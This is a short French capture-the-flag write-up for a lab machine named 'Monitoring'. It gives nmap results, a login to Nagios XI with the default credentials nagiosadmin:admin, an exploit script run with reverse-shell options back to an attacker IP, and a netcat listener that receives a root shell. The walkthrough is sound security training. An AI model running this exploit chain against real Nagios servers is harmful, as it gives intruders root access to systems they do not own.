# Monitoring `nagios` * Nom machine : Monitoring * Difficulté : Facile * OS : Linux ## Enumération ### NMAP ``` Nmap scan report for 192.168.185.136 Host is up (0.032s latency). Not shown: 65529 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b8:8c:40:f6:5f:2a:8b:f7:92:a8:81:4b:bb:59:6d:02 (RSA) | 256 e7:bb:11:c1:2e:cd:39:91:68:4e:aa:01:f6:de:e6:19 (ECDSA) |_ 256 0f:8e:28:a7:b7:1d:60:bf:a6:2b:dd:a3:6d:d1:4e:a4 (ED25519) 25/tcp open smtp Postfix smtpd | ssl-cert: Subject: commonName=ubuntu | Issuer: commonName=ubuntu | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2020-09-08T17:59:00 | Not valid after: 2030-09-06T17:59:00 | MD5: e067:1ea3:92c2:ec73:cb21:de0e:73df:cb66 |_SHA-1: e39c:c9b6:c35b:b608:3dd0:cd25:e60f:cb61:6551:da77 |_ssl-date: TLS randomness does not represent time |_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-favicon: Unknown favicon MD5: 8E1494DD4BFF0FC523A2E2A15ED59D84 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Nagios XI 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Nagios XI |_http-server-header: Apache/2.4.18 (Ubuntu) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US | Issuer: commonName=192.168.1.6/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-09-08T18:28:08 | Not valid after: 2030-09-06T18:28:08 | MD5: 20f0:951f:8eff:1b69:ef3f:1b1e:fb4c:361f |_SHA-1: cc40:0ad7:60cf:4959:1c92:d9ab:0f06:106c:18f6:6661 5667/tcp open tcpwrapped Service Info: Host: ubuntu; OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### HTTP (80) On tombe sur une page nagios XI. Pour s'authentifier, nagiosadmin:admin fonctionne. Nous allons chercher un exploit. On en trouve un qui permet d'être directement root. ## Accès initial {% embed url="" %} ``` ┌──(kali㉿kali)-[~/oscp] └─$ php nagios.php --host=192.168.185.136 --user=nagiosadmin --pass=admin --reverseip=192.168.45.239 --reverseport=1234 --ssl=false [+] Grabbing NSP from: http://192.168.185.136/nagiosxi/login.php [+] Retrieved page contents from: http://192.168.185.136/nagiosxi/login.php [+] Extracted NSP - value: 891a9b99f010090c4531ea154009165b28458cf0ae837111549d7ce383e7dcdf [+] Attempting to login... [+] Authentication success [+] Checking we have admin rights... [+] Admin access confirmed [+] Grabbing NSP from: http://192.168.185.136/nagiosxi/admin/monitoringplugins.php [+] Retrieved page contents from: http://192.168.185.136/nagiosxi/admin/monitoringplugins.php [+] Extracted NSP - value: beb5f60df1066c2a2b03486238114ac36f14150f111e65206fb32d9a4c9f5fed [+] Uploading payload... [+] Payload uploaded [+] Triggering payload: if successful, a reverse shell will spawn at 192.168.45.239:1234 ``` ``` ┌──(kali㉿kali)-[~/oscp] └─$ nc -lnvp 1234 listening on [any] 1234 ... connect to [192.168.45.239] from (UNKNOWN) [192.168.185.136] 32820 bash: cannot set terminal process group (949): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/usr/local/nagiosxi/html/includes/components/profile# whoami whoami root ```